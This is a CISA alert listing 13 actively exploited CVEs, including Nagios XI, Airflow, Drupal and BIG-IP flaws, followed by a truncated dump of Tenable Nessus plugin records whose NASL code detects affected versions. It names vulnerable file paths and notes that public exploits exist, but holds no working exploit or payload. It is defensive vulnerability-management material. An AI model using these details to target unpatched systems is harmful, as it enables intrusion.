CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.
**CVE Number** | **CVE Title** | **Required Action Due Date**
---|---|---
CVE-2021-32648 | October CMS Improper Authentication | 2/1/2022
CVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022
CVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022
CVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022
CVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022
CVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022
CVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022
CVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022
CVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022
CVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022
[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).
This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.
**Please share your thoughts.**
We recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.
{"nessus": [{"lastseen": "2023-05-18T14:40:59", "description": "According to the self-reported version of Nagios XI, the remote host may be affected by multiple vulnerabilities, including the following:\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25296).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25297).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25298).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-04T00:00:00", "type": "nessus", "title": "Nagios XI 5.7.5 Command Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:nagios:nagios_xi"], "id": "NAGIOSXI_5_7_5_COMMAND_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/157377", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157377);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-25296\", \"CVE-2021-25297\", \"CVE-2021-25298\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n\n script_name(english:\"Nagios XI 5.7.5 Command Injection\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application that may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the self-reported version of Nagios XI, the remote host may be affected by multiple vulnerabilities, including\nthe following:\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25296).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25297).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25298).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/downloads/nagios-xi/change-log/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/products/security/\");\n script_set_attribute(attribute:\"solution\", value:\n\"See vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-25298\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/04\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nagios:nagios_xi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"nagios_enterprise_detect.nasl\");\n script_require_keys(\"installed_sw/nagios_xi\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('http_func.inc');\ninclude('vcf_extras.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar app_info = vcf::nagiosxi::get_app_info(port:port);\n\nvar constraints = [\n {'min_version': '5.7.5', 'max_version': '5.7.5.99999', 'fixed_display': 'See vendor advisory'}\n];\n\n# DOn't use the vcf::nagiosxi as we don't want R201* versions to be flagged\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:28", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K56715231 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access control or remote code execution (RCE). Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22991)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : TMM buffer-overflow vulnerability (K56715231)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22991"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL56715231.NASL", "href": "https://www.tenable.com/plugins/nessus/147623", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K56715231.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147623);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-22991\");\n script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0017\");\n\n script_name(english:\"F5 Networks BIG-IP : TMM buffer-overflow vulnerability (K56715231)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 /\n16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K56715231 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled\n by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow,\n resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access\n control or remote code execution (RCE). Note: Software versions which have reached End of Software\n Development (EoSD) are not evaluated. (CVE-2021-22991)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K56715231\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K56715231.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22991\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K56715231';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-01T04:28:29", "description": "The remote host contains a systeminformation npm module that is prior to 5.3.1. It is, therefore, affected by a command injection vulnerability. The System Information Library for Node.JS (npm package 'systeminformation') is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. The vulnerability was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), or si.processLoad()... to only allow strings and reject any arrays. String sanitization works as expected.", "cvss3": {}, "published": "2022-08-10T00:00:00", "type": "nessus", "title": "NodeJS System Information Library Command Injection (CVE-2021-21315)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21315"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:systeminformation:systeminformation"], "id": "NODEJS_CVE-2021-21315.NBIN", "href": "https://www.tenable.com/plugins/nessus/164017", "sourceData": "Binary data nodejs_cve-2021-21315.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:31:25", "description": "The version of Apache Airflow is prior to 1.10.11. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands. (CVE-2020-11981)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attack can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload directly to the broker which could lead to a deserialization attack (and thus remote code execution) on the Worker. (CVE-2020-11982)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. (CVE-2020-11978)\n\n - The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default [api]auth_backend = airflow.api.auth.backend.deny_all as mentioned in the Updating Guide:\n https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default (CVE-2020-13927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-13T00:00:00", "type": "nessus", "title": "Apache Airflow < 1.10.11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11978", "CVE-2020-11981", "CVE-2020-11982", "CVE-2020-11983", "CVE-2020-13927", "CVE-2020-9485"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:airflow"], "id": "APACHE_AIRFLOW_1_10_11.NASL", "href": "https://www.tenable.com/plugins/nessus/162136", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162136);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-9485\",\n \"CVE-2020-11978\",\n \"CVE-2020-11981\",\n \"CVE-2020-11982\",\n \"CVE-2020-11983\",\n \"CVE-2020-13927\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Apache Airflow < 1.10.11 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is missing a vendor-supplied update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Airflow is prior to 1.10.11. It is, therefore, affected by multiple vulnerabilities, including\nthe following:\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker\n can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the\n celery worker running arbitrary commands. (CVE-2020-11981)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attack\n can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload\n directly to the broker which could lead to a deserialization attack (and thus remote code execution) on\n the Worker. (CVE-2020-11982)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection\n vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any\n authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on\n the executor in use). If you already have examples disabled by setting load_examples=False in the config\n then you are not vulnerable. (CVE-2020-11978)\n\n - The previous default setting for Airflow's Experimental API was to allow all API requests without\n authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the\n default has been changed to deny all requests by default and is documented at\n https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for\n new installs but existing users need to change their config to default\n [api]auth_backend = airflow.api.auth.backend.deny_all as mentioned in the Updating Guide:\n https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default\n (CVE-2020-13927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d\");\n # https://airflow.apache.org/docs/apache-airflow/2.3.1/release_notes.html#airflow-1-10-11-2020-07-10\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?152f8770\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Airflow version 1.10.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13927\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:airflow\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_airflow_web_api_detect.nbin\");\n script_require_keys(\"installed_sw/Apache Airflow\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:8080);\nvar app_info = vcf::get_app_info(app:'Apache Airflow', port:port, webapp:TRUE);\nvar constraints = [{ 'fixed_version': '1.10.11'}];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:22", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.74, 8.x prior to 8.8.11, 8.9.x prior to 8.9.9, or 9.0.x prior to 9.0.8. It is, therefore, affected by a remote code execution vulnerability in its file upload functionality due to a failure to sanitize filenames. An authenticated, remote attacker can exploit this to execute arbitrary php code under certain hosting configurations.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-20T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.74 / 8.x < 8.8.11 / 8.9.x < 8.9.9 / 9.0.x < 9.0.8 RCE (SA-CORE-2020-012)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13671"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_9_0_8.NASL", "href": "https://www.tenable.com/plugins/nessus/143126", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143126);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-13671\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Drupal 7.x < 7.74 / 8.x < 8.8.11 / 8.9.x < 8.9.9 / 9.0.x < 9.0.8 RCE (SA-CORE-2020-012)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.74,\n8.x prior to 8.8.11, 8.9.x prior to 8.9.9, or 9.0.x prior to 9.0.8. It is, therefore, affected by a remote code \nexecution vulnerability in its file upload functionality due to a failure to sanitize filenames. An authenticated, \nremote attacker can exploit this to execute arbitrary php code under certain hosting configurations.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/sa-core-2020-012\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.74\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.8.11\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.9.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/9.0.8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.74 / 8.8.11 / 8.9.9 / 9.0.8 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13671\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\napp_info = vcf::get_app_info(app:'Drupal', 